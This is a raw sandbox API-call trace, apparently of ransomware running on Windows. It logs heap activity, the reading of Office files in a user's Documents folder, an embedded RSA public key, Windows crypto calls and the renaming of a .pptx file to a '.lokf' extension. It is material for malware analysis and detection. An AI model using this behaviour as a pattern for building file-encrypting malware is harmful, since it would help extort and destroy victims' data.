RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3282810 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.783] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b160 [0058.783] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0058.783] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b178 [0058.783] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0058.783] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0058.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b148 [0058.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0058.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0058.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0058.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0058.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b190 [0058.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0058.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0058.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0058.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0058.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0058.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b160 | out: hHeap=0x660000) returned 1 [0058.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b160 [0058.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0058.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0058.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0058.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3296fa8 [0058.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0058.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b160 | out: hHeap=0x660000) returned 1 [0058.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0058.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0058.785] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x32679f8 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3292fe8 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32679f8 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296fa8 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b190 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b178 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b148 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b130 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c829b0 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3282810 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32619a0 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0058.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.786] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.786] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0058.786] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c83710*, nNumberOfBytesToWrite=0x15d4b, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c83710*, lpNumberOfBytesWritten=0x9f4fb14*=0x15d4b, lpOverlapped=0x0) returned 1 [0058.786] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c83710 | out: hHeap=0x660000) returned 1 [0058.786] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15d50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.786] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.786] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.786] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bcd8 [0058.786] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0058.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0058.786] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0058.786] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.786] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bcd8 | out: hHeap=0x660000) returned 1 [0058.786] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0058.786] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.786] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.786] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.786] CloseHandle (hObject=0x5cc) returned 1 [0058.788] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0058.788] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.788] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0058.788] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-zw2kUwzHbrh6GhQEKb.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-zw2kuwzhbrh6ghqekb.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-zw2kUwzHbrh6GhQEKb.pptx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-zw2kuwzhbrh6ghqekb.pptx.lokf")) returned 1 [0058.788] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.788] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.788] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.789] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0058.789] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecfb9bf0, ftCreationTime.dwHighDateTime=0x1d50c7f, ftLastAccessTime.dwLowDateTime=0x2fc13690, ftLastAccessTime.dwHighDateTime=0x1d577c2, ftLastWriteTime.dwLowDateTime=0x2fc13690, ftLastWriteTime.dwHighDateTime=0x1d577c2, nFileSizeHigh=0x0, nFileSizeLow=0x15707, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0LcY86kifJlQ7.xlsx", cAlternateFileName="0LCY86~1.XLS")) returned 1 [0058.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bcd8 [0058.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adb18 [0058.789] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bcd8 | out: hHeap=0x660000) returned 1 [0058.789] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0LcY86kifJlQ7.xlsx") returned=".xlsx" [0058.789] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0LcY86kifJlQ7.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0lcy86kifjlq7.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.789] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=87815) returned 1 [0058.789] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.792] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x156e1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.792] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.792] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.793] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x15707, lpOverlapped=0x0) returned 1 [0058.793] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.793] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.793] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.793] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.794] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.794] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.794] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.794] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.794] GetLastError () returned 0x0 [0058.794] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.794] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.794] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.794] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.794] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x15710) returned 0x9c83710 [0058.795] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0058.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0058.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0058.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0058.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c829b0 [0058.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b130 [0058.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c829f8 [0058.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b148 [0058.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b178 [0058.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b190 [0058.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0058.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0058.795] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b178 | out: hHeap=0x660000) returned 1 [0058.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b190 | out: hHeap=0x660000) returned 1 [0058.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0058.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b190 [0058.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0058.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b178 [0058.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0058.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0058.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0058.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0058.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b190 | out: hHeap=0x660000) returned 1 [0058.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b178 | out: hHeap=0x660000) returned 1 [0058.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0058.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0058.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.796] GetCurrentThreadId () returned 0x9e0 [0058.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326a688 [0058.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7cba8 [0058.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0058.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0058.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0058.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3234418 [0058.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.796] GetCurrentThreadId () returned 0x9e0 [0058.796] RtlAllocateHeap (HeapHandle=0x660000, 